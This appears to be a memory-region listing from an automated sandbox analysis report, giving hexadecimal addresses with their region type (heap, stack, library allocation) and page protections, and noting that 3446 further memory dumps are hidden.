page read and write
2159ACDF000
heap
page read and write
22A5F19D000
heap
page read and write
2159CE91000
heap
page read and write
201858C9000
heap
page read and write
1FC803E4000
trusted library allocation
page read and write
201876D7000
heap
page read and write
2159CF64000
heap
page read and write
251FD73B000
heap
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
22A5F3EF000
heap
page read and write
2159CCDD000
heap
page read and write
1C515959000
trusted library allocation
page read and write
2C4453E0000
heap
page read and write
1EC8638E000
trusted library allocation
page read and write
201876B6000
heap
page read and write
7FF7B37D0000
trusted library allocation
page read and write
251FD3A0000
heap
page read and write
21B61728000
heap
page read and write
1276B570000
heap
page read and write
21B6183B000
heap
page read and write
251FD6A0000
heap
page read and write
EF1F6FC000
stack
page read and write
BBB627D000
stack
page read and write
EEE1D4E000
stack
page read and write
20694659000
heap
page read and write
1FC8007B000
trusted library allocation
page read and write
12752FD0000
trusted library allocation
page read and write
7FF7B3B00000
trusted library allocation
page read and write
2159CCF8000
heap
page read and write
22B803CA000
trusted library allocation
page read and write
251FB420000
heap
page read and write
1EE87FE000
stack
page read and write
251FD4B1000
heap
page read and write
946793C000
stack
page read and write
22A5F139000
heap
page read and write
20187A4D000
heap
page read and write
2276BF88000
heap
page read and write
22D54D0A000
trusted library allocation
page read and write
214AB700000
heap
page read and write
BBB64BE000
stack
page read and write
2276DF1D000
heap
page read and write
251FD74E000
heap
page read and write
202B070A000
heap
page read and write
38D69BE000
stack
page read and write
288CAB20000
heap
page read and write
20187A1B000
heap
page read and write
1AF190CB000
trusted library allocation
page read and write
237B18FB000
heap
page read and write
1F0D2C40000
trusted library allocation
page read and write
1C515210000
heap
page readonly
258D3A48000
heap
page read and write
20694653000
heap
page read and write
1330000
heap
page read and write
182D18E8000
heap
page read and write
258D3A38000
heap
page read and write
B88C23E000
stack
page read and write
16080933000
heap
page read and write
2C443B40000
heap
page readonly
21B61853000
heap
page read and write
21B5F7CC000
heap
page read and write
180C4DF6000
heap
page read and write
28176FF000
stack
page read and write
251FD41E000
heap
page read and write
2069468F000
heap
page read and write
288CABBE000
heap
page read and write
EEE1CCE000
stack
page read and write
1C5137C0000
heap
page read and write
21B615FD000
heap
page read and write
1AF1A3E5000
trusted library allocation
page read and write
1E07BCAC000
heap
page read and write
1AF19100000
trusted library allocation
page read and write
37791F2000
stack
page read and write
CAB33FE000
stack
page read and write
461EF7000
stack
page read and write
2159CF2B000
heap
page read and write
1EC85071000
trusted library allocation
page read and write
2C44599C000
heap
page read and write
2F6E137000
stack
page read and write
38D6ABE000
stack
page read and write
196803E7000
trusted library allocation
page read and write
22A5F046000
heap
page read and write
1E07BF52000
heap
page read and write
212F3E2D000
heap
page read and write
2276E12A000
heap
page read and write
1EE96E90000
heap
page read and write
2069466D000
heap
page read and write
53DCF7E000
stack
page read and write
1EC851A1000
trusted library allocation
page read and write
2276BF80000
heap
page read and write
2159CF36000
heap
page read and write
EEE0F77000
stack
page read and write
1275168B000
heap
page read and write
2276E128000
heap
page read and write
2159CCFD000
heap
page read and write
2F6E079000
stack
page read and write
21B615A1000
heap
page read and write
1EE96CED000
heap
page read and write
14BFAFB000
stack
page read and write
2C445E68000
trusted library allocation
page read and write
23FDA416000
heap
page read and write
2159CF28000
heap
page read and write
1AF188C0000
heap
page read and write
1348000
heap
page read and write
251FD3F2000
heap
page read and write
127534B4000
trusted library allocation
page read and write
202B2610000
heap
page execute and read and write
1AF190DC000
trusted library allocation
page read and write
2276C03A000
heap
page read and write
1D93BDA9000
heap
page read and write
1EE94D00000
heap
page read and write
258D1AD9000
heap
page read and write
7FF7B37D3000
trusted library allocation
page execute and read and write
206945BC000
heap
page read and write
21B61616000
heap
page read and write
1D93D7A0000
trusted library allocation
page read and write
23FDC418000
heap
page read and write
20694655000
heap
page read and write
22A5F036000
heap
page read and write
180C46E7000
heap
page read and write
173E7BD000
stack
page read and write
2069468F000
heap
page read and write
6B3EA7F000
stack
page read and write
182D18DB000
heap
page read and write
20187907000
heap
page read and write
BC5587F000
stack
page read and write
206945DD000
heap
page read and write
2159CF5A000
heap
page read and write
21B615E8000
heap
page read and write
2C44396C000
heap
page read and write
22D6C880000
heap
page read and write
180C471B000
heap
page read and write
22D54881000
trusted library allocation
page read and write
B88CD0E000
stack
page read and write
745ABF7000
stack
page read and write
182D18BD000
heap
page read and write
22A5F326000
heap
page read and write
23FDC5B6000
heap
page read and write
59DE000
stack
page read and write
AC9AEFF000
stack
page read and write
21B614A0000
heap
page read and write
1D94DCF1000
trusted library allocation
page read and write
214A9C70000
heap
page readonly
2C443950000
heap
page read and write
1C0CBC58000
trusted library allocation
page read and write
258D396E000
heap
page read and write
1EE867F000
stack
page read and write
2276DFE5000
heap
page read and write
2276DEA7000
heap
page read and write
180C46A1000
heap
page read and write
1C0C9C30000
heap
page read and write
180C46F2000
heap
page read and write
7FF7B38AC000
trusted library allocation
page execute and read and write
23FDC2C3000
heap
page read and write
1F0D13BB000
heap
page read and write
22C26CE6000
heap
page read and write
23FDC2D2000
heap
page read and write
212F3F3B000
heap
page read and write
6B3F17B000
stack
page read and write
214ABC01000
trusted library allocation
page read and write
20694655000
heap
page read and write
4A3723E000
stack
page read and write
258D3938000
heap
page read and write
22C26BB2000
heap
page read and write
22C26BEC000
heap
page read and write
173E838000
stack
page read and write
288CCE00000
heap
page read and write
202B2070000
heap
page readonly
2276E02A000
heap
page read and write
1E07C05E000
heap
page read and write
180C4DDB000
heap
page read and write
180C4C3A000
heap
page read and write
182D17B3000
heap
page read and write
180C2C75000
heap
page read and write
1EC86152000
trusted library allocation
page read and write
21B5F7F6000
heap
page read and write
7FF7B38B0000
trusted library allocation
page execute and read and write
16082660000
heap
page execute and read and write
212F3C03000
heap
page read and write
258D3968000
heap
page read and write
38D693E000
stack
page read and write
251FD76E000
heap
page read and write
251FD3A5000
heap
page read and write
16080973000
heap
page read and write
23FDA3C0000
heap
page read and write
251FD407000
heap
page read and write
38D6779000
stack
page read and write
1E079C10000
heap
page read and write
180C2D60000
heap
page read and write
7FF681C00000
unkown
page read and write
1EC82DE0000
heap
page read and write
202B27A8000
trusted library allocation
page read and write
21710620000
trusted library allocation
page read and write
12EBB9CE000
heap
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
1EE96E4B000
heap
page read and write
21B614D2000
heap
page read and write
7FF7B39C0000
trusted library allocation
page execute and read and write
4A3707E000
stack
page read and write
20187935000
heap
page read and write
1E07B7A6000
heap
page read and write
22D54974000
trusted library allocation
page read and write
202B20C0000
trusted library allocation
page read and write
7DF12CE000
stack
page read and write
53DD2BF000
stack
page read and write
7FF7B3A20000
trusted library allocation
page read and write
20694657000
heap
page read and write
1C51387F000
heap
page read and write
16080A10000
heap
page readonly
21B614A7000
heap
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
1609A7F1000
heap
page read and write
7FF7B37E0000
trusted library allocation
page read and write
1EE96B92000
heap
page read and write
There are 3446 hidden memdumps, click here to show them.